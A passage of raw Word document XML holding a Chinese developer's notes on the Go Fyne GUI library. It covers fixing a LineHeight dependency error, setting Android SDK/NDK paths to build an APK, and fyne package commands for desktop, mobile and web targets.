        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>下方的“终端”测试是否能识别到</w:t>
      </w:r>
      <w:r w:rsidRPr="00220416">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:r w:rsidRPr="00220416">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F59C75" w14:textId="77777777" w:rsidR="00D175FD" w:rsidRDefault="00D175FD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28F30167" w14:textId="77777777" w:rsidR="00CC5F21" w:rsidRDefault="00CC5F21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74E8F2C0" w14:textId="578B3BEF" w:rsidR="00AE0B67" w:rsidRDefault="00AE0B67" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>坑点</w:t>
      </w:r>
      <w:r w:rsidR="00934220">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报错</w:t>
      </w:r>
      <w:r>
        <w:t>LineHeight</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD44A79" w14:textId="77777777" w:rsidR="00E71415" w:rsidRDefault="00E71415" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># fyne.io/fyne/v2/internal/painter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCF0A38" w14:textId="4D39DDCC" w:rsidR="00E71415" w:rsidRDefault="00E71415" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E:\BiLing\golang-study\pkg\mod\fyne.io\fyne\v2@v2.4.3\internal\painter\font.go:209:65: </w:t>
      </w:r>
      <w:r w:rsidRPr="001247E2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>out.LineBounds.LineHeight undefined (type shaping.Bounds has no field or method LineHeight)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729F6958" w14:textId="77777777" w:rsidR="00E71415" w:rsidRDefault="00E71415" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A73760A" w14:textId="53C9B5F6" w:rsidR="00AE0B67" w:rsidRDefault="00AE0B67" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531C93FF" w14:textId="2CA243BE" w:rsidR="00AE0B67" w:rsidRPr="00AE0B67" w:rsidRDefault="00AE0B67" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE0B67">
        <w:t>https://github.com/fyne-io/fyne/issues/4441</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D899C38" w14:textId="446E2A6A" w:rsidR="00CC5F21" w:rsidRDefault="00AE0B67" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE0B67">
        <w:t>https://github.com/fyne-io/fyne/issues/4520</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DC5FC4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EF4BC68" w14:textId="1DD2A654" w:rsidR="00AE0B67" w:rsidRDefault="00AE0B67" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导致这个报错的原因是</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE0B67">
        <w:t>github.com/go-text/typesetting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE0B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">LineHeight </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE0B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已重命名为</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE0B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> LineThickness</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（没细究是新版本还是旧版本分别对应哪个），不过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fyne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官方不认为是他们的错，这是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官方依赖的问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E966D4" w14:textId="2833DECF" w:rsidR="00AE0B67" w:rsidRDefault="00AE0B67" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="768D3248" w14:textId="6302DCE7" w:rsidR="00AE0B67" w:rsidRDefault="00AE0B67" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据开发者的提示，删除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go</w:t>
      </w:r>
      <w:r>
        <w:t>.mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后重新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mod init </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后再</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>o mod tidy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，就可以运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fyne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的代码了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BF0CFC" w14:textId="77777777" w:rsidR="00AE0B67" w:rsidRDefault="00AE0B67" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55D876A5" w14:textId="5F183F34" w:rsidR="00AE0B67" w:rsidRDefault="0059652B" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>坑点：构建安卓</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GUI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502C899F" w14:textId="66AFB3A0" w:rsidR="0059652B" w:rsidRDefault="0059652B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此前我安装过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Android</w:t>
      </w:r>
      <w:r w:rsidR="00541D36">
        <w:t xml:space="preserve"> Studio</w:t>
      </w:r>
      <w:r w:rsidR="00541D36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，我用该</w:t>
      </w:r>
      <w:r w:rsidR="00541D36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDE</w:t>
      </w:r>
      <w:r w:rsidR="00541D36">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00541D36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装过安卓</w:t>
      </w:r>
      <w:r w:rsidR="00541D36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SDK</w:t>
      </w:r>
      <w:r w:rsidR="00541D36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00541D36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NDK</w:t>
      </w:r>
      <w:r w:rsidR="00541D36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，因此模仿我如下命令，使用默认安装路径安装即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E72EE3" w14:textId="442DB4DF" w:rsidR="00541D36" w:rsidRDefault="00541D36" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此处注意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ndk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的相对路径，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ndk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也分版本，此处需要进入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ndk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录并带上版本号，否则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fyne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找不到对应的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ndk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报错。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7283C3A9" w14:textId="77777777" w:rsidR="0059652B" w:rsidRDefault="0059652B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67C0FDB9" w14:textId="57A866FC" w:rsidR="0059652B" w:rsidRPr="00541D36" w:rsidRDefault="0059652B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00541D36">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>set ANDROID_HOME=C:\Users\ranja\AppData\Local\Android\Sdk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7CB0C9" w14:textId="7A19A904" w:rsidR="0059652B" w:rsidRPr="00541D36" w:rsidRDefault="0059652B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00541D36">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>set ANDROID_NDK_HOME=C:\Users\ranja\AppData\Local\Android\Sdk\ndk\25.1.8937393</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B8F36B" w14:textId="77777777" w:rsidR="0059652B" w:rsidRDefault="0059652B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04B7C2D8" w14:textId="3B6BB298" w:rsidR="00541D36" w:rsidRDefault="00541D36" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置完环境变量后，再运行命令，生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>apk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidR="00415D3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00415D3C" w:rsidRPr="00415D3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>随便找个</w:t>
      </w:r>
      <w:r w:rsidR="00415D3C" w:rsidRPr="00415D3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Icon</w:t>
      </w:r>
      <w:r w:rsidR="00415D3C" w:rsidRPr="00415D3C">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.png</w:t>
      </w:r>
      <w:r w:rsidR="00415D3C" w:rsidRPr="00415D3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>放目录下，当图标</w:t>
      </w:r>
      <w:r w:rsidR="00415D3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA430B1" w14:textId="0C7BCEC3" w:rsidR="0059652B" w:rsidRPr="00541D36" w:rsidRDefault="00541D36" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00541D36">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>fyne package -os android -appID com.shenyanjian.cn -name "YourAppName"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4148114C" w14:textId="77777777" w:rsidR="0059652B" w:rsidRDefault="0059652B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33025998" w14:textId="6B9E7C38" w:rsidR="0059652B" w:rsidRPr="0059652B" w:rsidRDefault="00415D3C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00415D3C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E408A01" wp14:editId="2F927AAB">
            <wp:extent cx="977694" cy="2172686"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="525786771" name="图片 1" descr="电子设备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86771" name="图片 1" descr="电子设备的屏幕&#10;&#10;描述已自动生成"/>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995733" cy="2212773"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00415D3C">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415D3C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="436A403E" wp14:editId="42D05A7C">
            <wp:extent cx="977547" cy="2172361"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="853940138" name="图片 2"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40138" name="图片 2" descr="形状&#10;&#10;描述已自动生成"/>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87491" cy="2194459"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD5AC3A" w14:textId="77777777" w:rsidR="00AE0B67" w:rsidRDefault="00AE0B67" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28A62873" w14:textId="15146BAB" w:rsidR="00AE0B67" w:rsidRDefault="003B06CD" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构建打包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C22586" w14:textId="77777777" w:rsidR="003B06CD" w:rsidRDefault="003B06CD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="592A3DED" w14:textId="75E02827" w:rsidR="003B06CD" w:rsidRDefault="003B06CD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003B06CD">
        <w:t>fyne package -os darwin -icon myapp.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B04FEE" w14:textId="77777777" w:rsidR="003B06CD" w:rsidRDefault="003B06CD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>fyne package -os linux -icon myapp.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615B4D79" w14:textId="23F731AF" w:rsidR="003B06CD" w:rsidRDefault="003B06CD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>fyne package -os windows -icon myapp.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FED8523" w14:textId="77777777" w:rsidR="003B06CD" w:rsidRDefault="003B06CD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>fyne package -os android -appID com.example.myapp -icon mobileIcon.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBD9F2C" w14:textId="16195F97" w:rsidR="003B06CD" w:rsidRDefault="003B06CD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>fyne package -os ios -appID com.example.myapp -icon mobileIcon.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC2C342" w14:textId="10879069" w:rsidR="003B06CD" w:rsidRDefault="003B06CD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003B06CD">
        <w:t>fyne package -os iossimulator -appID com.example.myapp -icon mobileIcon.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2985767D" w14:textId="77777777" w:rsidR="003B06CD" w:rsidRDefault="003B06CD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ECC4FFE" w14:textId="3893E3AE" w:rsidR="003B06CD" w:rsidRPr="009B5CE3" w:rsidRDefault="009B5CE3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B5CE3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>甚至可以</w:t>
      </w:r>
      <w:r w:rsidRPr="009B5CE3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>WEB</w:t>
      </w:r>
      <w:r w:rsidRPr="009B5CE3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>上显示！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A6D7F4" w14:textId="3C2FE414" w:rsidR="003B06CD" w:rsidRDefault="009B5CE3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009B5CE3">
        <w:t>fyne serve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5B4177" w14:textId="77777777" w:rsidR="003B06CD" w:rsidRDefault="003B06CD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B254484" w14:textId="7503CC25" w:rsidR="009B5CE3" w:rsidRDefault="009B5CE3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接打包（</w:t>
      </w:r>
      <w:r w:rsidRPr="009B5CE3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="009B5CE3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>打包后其实不好用，加载进不去</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328D2351" w14:textId="5B6B8A42" w:rsidR="003B06CD" w:rsidRDefault="009B5CE3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009B5CE3">
        <w:t>fyne package -os web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFC3AA9" w14:textId="77777777" w:rsidR="009B5CE3" w:rsidRDefault="009B5CE3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="458C73F1" w14:textId="0F283CDB" w:rsidR="009B5CE3" w:rsidRDefault="009B5CE3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>您还可以选择仅打包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> WASM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而不是自动检测设置：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3848B10E" w14:textId="77777777" w:rsidR="009B5CE3" w:rsidRDefault="009B5CE3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>fyne package -os wasm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E24316" w14:textId="57BD2B05" w:rsidR="003B06CD" w:rsidRDefault="009B5CE3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>fyne package -os js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B453EA" w14:textId="77777777" w:rsidR="003B06CD" w:rsidRDefault="003B06CD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="383EC2BB" w14:textId="1F87DCED" w:rsidR="003B06CD" w:rsidRDefault="00C03C14" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交叉编译</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>fyne-cross</w:t>
      </w:r>
      <w:r w:rsidR="00226A7C">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00226A7C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暂时没啥用</w:t>
      </w:r>
      <w:r w:rsidR="00226A7C">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E031303" w14:textId="428E7679" w:rsidR="00C03C14" w:rsidRDefault="00C03C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交叉编译：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C03C14">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CGO_ENABLED=1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C03C14">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>告诉</w:t>
      </w:r>
      <w:r w:rsidRPr="00C03C14">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> go </w:t>
      </w:r>
      <w:r w:rsidRPr="00C03C14">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启用</w:t>
      </w:r>
      <w:r w:rsidRPr="00C03C14">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> C </w:t>
      </w:r>
      <w:r w:rsidRPr="00C03C14">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译器（当目标平台与当前系统不同时，通常会关闭该编译器）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00C03C14">
        <w:rPr>
